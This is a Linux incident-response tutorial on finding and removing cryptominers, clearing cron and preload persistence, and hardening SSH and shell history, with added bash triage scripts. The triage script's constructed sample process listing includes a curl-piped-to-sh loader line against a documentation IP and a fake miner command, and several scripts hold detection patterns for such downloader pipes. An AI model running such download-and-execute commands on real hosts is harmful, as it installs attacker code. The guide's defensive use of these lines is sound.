Master Linux Incident Response: Detect, Remove, and Harden Malware Infections

This guide walks you through a complete Linux incident‑response workflow—identifying suspicious behavior, locating and terminating malicious processes, eliminating virus files, closing persistence mechanisms, and hardening the system to prevent future compromises—using practical shell commands and real‑world examples.

Liangxu Linux

01 Identify Phenomena

Start by observing abnormal host behavior and checking system metrics and security alerts to spot potential malware activity.

CPU usage : Run top and press P to sort processes by CPU. A process that sits above 70% CPU for minutes under an unfamiliar or deliberately look-alike name (kdevtmpfsi, sysupdate, kthreaddi and the like) is a common cryptominer indicator; rule out a legitimate batch job or a runaway application before treating it as malware.

Process inspection : Use ps aux (the original text's ps -aux is accepted for compatibility but mixes BSD and UNIX option styles) to read full command lines; look for unfamiliar URLs, curl or wget output piped into a shell, base64-decoded payloads, mining-pool host:port arguments, and binaries launched from world-writable directories such as /tmp or /dev/shm.

Security gateway alerts : Correlate alerts with host activity to pinpoint processes communicating with C&C servers.

Network monitoring : Poll connections to a suspicious IP with: while true; do netstat -antp | grep [ip]; sleep 1; done (ss -antp is the modern equivalent of netstat -antp; the sleep keeps the loop from pinning a core). If the threat uses a domain rather than an IP, add a bogus entry for that domain to /etc/hosts (for example pointing it at 127.0.0.1) so the traffic goes somewhere harmless, then watch which process keeps trying to reach it.

Historical commands : Search the shell history with history, and read each user's ~/.bash_history file directly, because history shows only the current shell and an attacker may have run history -c or unset HISTFILE in their own session.
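The indicators above (CPU above 70%, downloader or URL strings in the command line, binaries running from temporary directories, mining-pool style host:port arguments) can be applied mechanically to a process listing. The script below is an added example and not code from the original article; the process lines it runs on are constructed in ps -eo pid,pcpu,user,args format so the rules can be exercised without a live infection, and the threshold and patterns are the article's, not a vendor's.

```shell
#!/bin/bash
# Added example (not from the original article): first-pass triage of a
# process list using the indicators described in the "Identify Phenomena"
# section. Sample lines are constructed, in `ps -eo pid,pcpu,user,args` format.

SAMPLE_PS=$(mktemp)
cat > "$SAMPLE_PS" <<'EOF'
  PID %CPU USER     COMMAND
    1  0.0 root     /sbin/init
  812  2.3 mysql    /usr/sbin/mysqld
 1204  0.1 www-data /usr/sbin/apache2 -k start
 2411 98.7 www-data /tmp/.X11-unix/kdevtmpfsi
 2419  0.0 www-data sh -c curl -fsSL http://198.51.100.7/ldr.sh | sh
 2430 71.2 root     /usr/local/bin/sysupdate -o pool.example:3333
 3100 45.0 postgres postgres: checkpointer
EOF

CPU_LIMIT=70   # the article's ">70% CPU" rule of thumb

# Read a ps listing from file $1 and print "PID<TAB>reasons" for every
# process that trips at least one rule. Columns: $1 pid, $2 %cpu, $3 user,
# $4.. command line (rebuilt because it may contain spaces).
flag_processes() {
    awk -v limit="$CPU_LIMIT" 'NR > 1 {
        cmd = ""; for (i = 4; i <= NF; i++) cmd = cmd (i > 4 ? " " : "") $i
        reasons = ""
        if ($2 + 0 > limit)                            reasons = reasons "high-cpu,"
        if (cmd ~ /^(\/tmp|\/dev\/shm|\/var\/tmp)\//)   reasons = reasons "tmp-binary,"
        if (cmd ~ /(curl|wget)[^|]*\|[ ]*(ba)?sh/)      reasons = reasons "downloader-pipe,"
        if (cmd ~ /https?:\/\//)                       reasons = reasons "url-in-args,"
        if (cmd ~ /(-o|--url)[ =]?[^ ]+:[0-9][0-9]+/)   reasons = reasons "pool-arg,"
        if (reasons != "") { sub(/,$/, "", reasons); print $1 "\t" reasons }
    }' "$1"
}

# Number of flagged processes, handy as an alert condition in a cron check.
flagged_count() { flag_processes "$1" | wc -l | tr -d ' '; }

# Live use on a host (bash): flag_processes <(ps -eo pid,pcpu,user,args --sort=-pcpu)
flag_processes "$SAMPLE_PS"
```

On the constructed listing, the miner in /tmp is flagged for both CPU and location, the loader shell for the curl-to-sh pipe and the URL, and the "sysupdate" process for CPU plus a pool-style argument; the busy postgres checkpointer stays below the threshold and is not reported. A hit is a reason to look at the process with the /proc and network checks above, not proof on its own.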

02 Remove Virus

After identifying the malicious process, preserve a copy of its binary if you want to analyze it, then terminate the process and delete its executable.

Kill process chain : List the process together with its parent and children and terminate the whole chain, not just one PID; miners are often started by a watchdog or a shell loop that respawns them:

ps -elf | grep [pid]
kill -9 [pid]

Delete virus file : Resolve the executable through /proc before killing the process, because the link disappears with it. If the link ends in (deleted), the malware removed its own file after starting and the binary exists only while the process runs, so copy /proc/[pid]/exe somewhere safe first if you need a sample. If rm -f reports "Operation not permitted" as root, check for the immutable attribute with lsattr and clear it with chattr -i before deleting.

ls -al /proc/[pid]/exe
rm -f [exe_path]
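The kill-and-delete steps above lose evidence if run in that order: once the process is gone, /proc/[pid]/exe, its working directory, open files and parent chain are gone too. The script below is an added example, not code from the original article; it captures those artifacts from /proc into an evidence directory first, then kills the process and its descendants leaf-first. It assumes a Linux /proc and the procps pgrep utility; the /root/ir evidence path is an arbitrary choice.

```shell
#!/bin/bash
# Added example (not from the original article): collect /proc evidence for a
# PID, then kill the whole process tree. Assumes Linux /proc and pgrep.

# Walk PPid links from PID up to init, printing each PID, child first.
parent_chain() {
    local pid=$1
    while [ "$pid" -gt 0 ] 2>/dev/null && [ -r "/proc/$pid/status" ]; do
        echo "$pid"
        pid=$(awk '/^PPid:/ {print $2}' "/proc/$pid/status")
    done
}

# PID and all of its descendants, deepest first, so children die before
# the watchdog parent that would respawn them.
descendants() {
    local pid=$1 child
    for child in $(pgrep -P "$pid"); do
        descendants "$child"
    done
    echo "$pid"
}

# Save binary and metadata of PID under DIR; prints the resolved exe path.
# A path ending in "(deleted)" means the malware unlinked its own file;
# /proc/PID/exe still yields the bytes as long as the process lives.
collect_evidence() {
    local pid=$1 dir=$2 exe
    mkdir -p "$dir"
    exe=$(readlink "/proc/$pid/exe")
    echo "$exe" > "$dir/exe_path"
    tr '\0' ' ' < "/proc/$pid/cmdline" > "$dir/cmdline"; echo >> "$dir/cmdline"
    readlink "/proc/$pid/cwd" > "$dir/cwd"
    cp "/proc/$pid/exe" "$dir/sample.bin" 2>/dev/null || true
    parent_chain "$pid" > "$dir/parent_chain"
    ls -l "/proc/$pid/fd" > "$dir/fds" 2>/dev/null || true
    echo "$exe"
}

# kill -9 the tree rooted at PID, leaves first.
kill_tree() {
    local pid=$1 p
    for p in $(descendants "$pid"); do
        kill -9 "$p" 2>/dev/null || true
    done
}

# Usage: ./respond.sh <pid>   (run as root for other users' processes).
# Evidence lands in /root/ir/<pid>; remove the on-disk file afterwards using
# the path recorded in exe_path, unless it was already "(deleted)".
if [ -n "$1" ] && [ -d "/proc/$1" ]; then
    collect_evidence "$1" "/root/ir/$1"
    kill_tree "$1"
fi
```

The evidence directory gives you the hash of the sample, the exact command line and the spawning chain for the write-up, and sample.bin can be submitted to a sandbox or scanner even when the original file was self-deleted.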

03 Close Loop (Persistence Cleanup)

Ensure the malware cannot re‑establish itself.

Check scheduled tasks : List the current user's crontab, then repeat for every account and read the system-wide locations (/etc/crontab, /etc/cron.d/, the /etc/cron.hourly/ style directories and /var/spool/cron/), because a miner dropped through a web shell usually lands in the web server user's crontab rather than root's:

crontab -l
cat /etc/anacrontab

Inspect services : service --status-all on SysV hosts; on systemd hosts also review the unit files under /etc/systemd/system/ for recently added or oddly named services. Detect hijacked system files (modified within the last week):

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime -7 | xargs ls -la

Malware sometimes resets modification times to blend in; repeat the search with -ctime -7, since the inode change time cannot be set from user space without also updating it.

Search for malicious kernel modules : lsmod lists loaded modules (the "drivers" of the original text); anything not shipped with the running kernel deserves a look. Install and run chkrootkit or rkhunter for rootkit detection, keeping in mind that a kernel rootkit can hide processes, files and modules from tools run on the infected host itself. Monitor a suspicious process with lsof -p [pid] (open files, sockets and deleted binaries) and strace -tt -T -e trace=all -p [pid] (every syscall with a timestamp and duration).
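The persistence checks in this section are easy to forget one at a time, so the script below, an added example and not code from the original article, collects them into functions that each take their location as an argument. That makes the same functions usable against the real /etc/cron.d and /var/spool/cron on a host and against a constructed directory when testing. The suspicious-pattern list and the /etc/ld.so.preload check are additions beyond the article's own list; the paths are the standard Linux ones.

```shell
#!/bin/bash
# Added example (not from the original article): audit common Linux
# persistence locations for miner-style indicators.

# Patterns that are almost never legitimate in a cron entry: download piped
# to a shell, base64-decoded payloads, binaries under world-writable dirs,
# raw-IP URLs.
SUSPICIOUS='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/(tmp|dev/shm|var/tmp)/|https?://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+'

# Print "file:line:entry" for every non-comment cron line matching SUSPICIOUS.
# Hidden files are included; attackers like names such as ".sysupd".
scan_cron_dir() {
    local dir=$1
    [ -d "$dir" ] || return 0
    grep -rEn "$SUSPICIOUS" "$dir" 2>/dev/null \
        | grep -vE '^[^:]+:[0-9]+:[[:space:]]*#' || true
}

# /etc/ld.so.preload is normally absent or empty; any library listed there
# is injected into every dynamically linked program, the classic userland
# rootkit hook. Prints the entries and returns 1 if any exist.
check_preload() {
    local file=${1:-/etc/ld.so.preload}
    [ -s "$file" ] || return 0
    grep -v '^[[:space:]]*$' "$file"
    return 1
}

# Files under DIR whose inode changed in the last DAYS days, newest first.
# ctime rather than mtime: touch -d / touch -r forge only mtime.
recent_files() {
    local dir=$1 days=${2:-7}
    find "$dir" -type f -ctime "-$days" -printf '%C@ %p\n' 2>/dev/null \
        | sort -rn | cut -d' ' -f2-
}

# Files with the immutable attribute: attackers run chattr +i so that
# rm -f on their binary fails even for root.
immutable_files() {
    local dir=$1
    lsattr -R "$dir" 2>/dev/null | awk '$1 ~ /i/ {print $2}' || true
}

run_audit() {
    echo "== suspicious cron entries =="
    scan_cron_dir /etc/cron.d; scan_cron_dir /var/spool/cron; scan_cron_dir /var/spool/cron/crontabs
    echo "== ld.so.preload =="
    check_preload || echo "!! preload hook present"
    echo "== system binaries changed in the last 7 days =="
    for d in /usr/bin /usr/sbin /bin /usr/local/bin; do recent_files "$d" 7; done
    echo "== immutable files =="
    immutable_files /tmp; immutable_files /usr/local/bin
}

# Run the full audit when executed directly with no arguments.
[ $# -eq 0 ] && [ "${AUDIT_NOW:-0}" = 1 ] && run_audit
```

Run it as root with AUDIT_NOW=1; the recent_files output will include anything a package manager updated this week, so compare against the package manager's log before treating a path as hijacked.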

04 System Hardening

Strengthen the host to prevent future infections, especially web‑based attacks.

Fix weak SSH passwords : Review successful logins. The log is /var/log/secure on RHEL-family hosts and /var/log/auth.log on Debian and Ubuntu; the awk fields pick out the date, the user and the source IP:

grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'

Identify brute-force sources. The counts need a sort first, because uniq -c only merges adjacent identical lines:

grep "Failed password" /var/log/secure | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort | uniq -c | sort -rn

An address that shows up with many failures and then an Accepted line is a guessed password, not a typo: change that account's password, and prefer disabling password authentication in sshd_config altogether in favor of keys.
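The two one-liners above answer "who logged in" and "who hammered the door" separately; the question an investigator wants answered is where they overlap. The script below is an added example, not code from the original article: it wraps both searches in functions and adds the correlation, and it runs on sshd log lines constructed for the example in the syslog format that both /var/log/secure and /var/log/auth.log use. The IP addresses are documentation ranges, not real sources.

```shell
#!/bin/bash
# Added example (not from the original article): sshd log triage with the
# brute-force-then-success correlation. Log lines below are constructed.

SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
Mar  3 02:11:01 web1 sshd[2201]: Failed password for root from 203.0.113.9 port 51022 ssh2
Mar  3 02:11:03 web1 sshd[2203]: Failed password for root from 203.0.113.9 port 51031 ssh2
Mar  3 02:11:05 web1 sshd[2205]: Failed password for invalid user admin from 203.0.113.9 port 51044 ssh2
Mar  3 02:11:09 web1 sshd[2209]: Accepted password for root from 203.0.113.9 port 51060 ssh2
Mar  3 08:20:11 web1 sshd[3310]: Failed password for deploy from 198.51.100.20 port 40012 ssh2
Mar  3 08:20:40 web1 sshd[3312]: Accepted publickey for deploy from 198.51.100.20 port 40020 ssh2
Mar  3 09:02:17 web1 sshd[3400]: Failed password for root from 192.0.2.77 port 33001 ssh2
EOF

# "count ip" per source, most failures first. sort before uniq -c, because
# uniq only collapses adjacent duplicates.
failed_by_ip() {
    grep "Failed password" "$1" \
      | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}" \
      | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# "date time user method ip" for each successful login. Accepted lines never
# carry the "invalid user" words that shift fields in Failed lines, so the
# user is always $9, the method $7 and the IP $11.
accepted_logins() {
    grep "Accepted " "$1" | awk '{print $1, $2, $3, $9, $7, $11}'
}

# Sources with at least $2 failures (default 3) that also have an Accepted
# line: a guessed password rather than a mistyped one.
bruteforce_successes() {
    local log=$1 threshold=${2:-3}
    failed_by_ip "$log" | awk -v t="$threshold" '$1 >= t {print $2}' | while read -r ip; do
        if grep -q "Accepted .* from $ip " "$log"; then
            echo "$ip"
        fi
    done
}

# Point these at /var/log/secure or /var/log/auth.log on a real host.
failed_by_ip "$SAMPLE_LOG"
accepted_logins "$SAMPLE_LOG"
bruteforce_successes "$SAMPLE_LOG" 3
```

On the sample, 203.0.113.9 fails three times and then gets root with a password, so it is reported; 198.51.100.20 has one failure followed by a key-based login, which is the deploy user mistyping a passphrase, and is not.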

Enable command auditing : Enlarge the history buffer and stamp every history entry with the time, the source IP and the user, so the history an investigation relies on survives longer and names who ran what. Put the lines in /etc/profile (or a file under /etc/profile.d/) so they apply to every login shell; note that the sed only does something if /etc/profile already contains the line HISTSIZE=1000, and that the IP comes from the remote-host column that who records for the session, so check the value after sourcing the file.

# keep 10000 entries instead of the default 1000
sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile
# source address of the current login, taken from who's "(host)" column;
# fall back to the hostname when nothing was recorded
USER_IP=$(who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g')
if [ "$USER_IP" = "" ]; then USER_IP=$(hostname); fi
# prefix every history line with date, time, source IP and user
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
# append instead of overwrite, and flush after each command so killing
# the shell cannot discard the lines
shopt -s histappend
export PROMPT_COMMAND="history -a"
source /etc/profile

Apply common web vulnerability patches : Update exposed services and apply the fixes for the exploits that miner botnets scan for most, such as Apache Struts2 and ThinkPHP remote code execution, Redis unauthorized access (used to write cron entries and SSH keys), Confluence CVE-2019-3396, Drupal CVE-2018-7600, and similar.

Linux servers are frequently targeted by botnet worms and cryptominers; maintaining strong passwords, regular patching, and diligent incident response are essential to keep systems secure.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: Linux, incident response, Security, System Hardening, Malware Removal
Written by Liangxu Linux

Liangxu, a self-taught IT professional now working as a Linux development engineer at a Fortune 500 multinational, shares extensive Linux knowledge: fundamentals, applications, tools, plus Git, databases, Raspberry Pi, etc. (Reply "Linux" to receive essential resources.)